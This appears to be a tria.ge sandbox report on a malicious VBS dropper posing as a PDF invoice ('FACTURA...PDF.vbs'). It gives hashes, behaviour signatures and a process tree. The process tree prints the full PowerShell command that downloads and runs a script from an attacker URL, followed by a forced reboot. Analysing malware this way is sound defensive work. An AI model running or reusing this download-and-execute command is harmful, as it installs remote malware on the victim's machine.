Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

FACTURAgzn...DF.vbs

windows7-x64

FACTURAgzn...DF.vbs

windows10-2004-x64

Analysis

  • max time kernel
    24s
  • max time network
    26s
  • platform
    windows7_x64
  • resource
    win7-20231025-en
  • resource tags

    arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
  • submitted
    24/11/2023, 00:08

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    FACTURAgzneih0__Ikb_(295).PDF.vbs

  • Size

    781B

  • MD5

    498f2220d6962b5b49fc6c2750610a90

  • SHA1

    06485ce9a6ba48a240c712497900a4240385ea02

  • SHA256

    36c56e3a9202c35e76a3ed10d00650c821b6ee9e1b3834fbab5fa5047d1ee99c

  • SHA512

    e7bd5952c327938e373811d3979c3a930d20782a9d8fc06f5f315da87f43ca02e3db86f65aaafebf63c86800df5733005f67db5a6dbf4546fd17ce4ed9649e42

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://dftssa.3utilities.com/03/17

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Drops startup file 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FACTURAgzneih0__Ikb_(295).PDF.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://dftssa.3utilities.com/03/17')"
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2184
      • C:\Windows\system32\shutdown.exe
        "C:\Windows\system32\shutdown.exe" /r /t 15
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2516
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    1⤵
      PID:2520
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x1
      1⤵
        PID:1772

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1772-28-0x00000000026D0000-0x00000000026D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2184-8-0x00000000020C0000-0x00000000020C8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2184-9-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2184-7-0x0000000002A80000-0x0000000002B00000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2184-6-0x0000000002A80000-0x0000000002B00000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2184-5-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2184-4-0x000000001B390000-0x000000001B672000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2184-10-0x0000000002A80000-0x0000000002B00000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2184-25-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2184-26-0x0000000002A80000-0x0000000002B00000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2520-27-0x00000000029C0000-0x00000000029C1000-memory.dmp

        Filesize

        4KB

        Download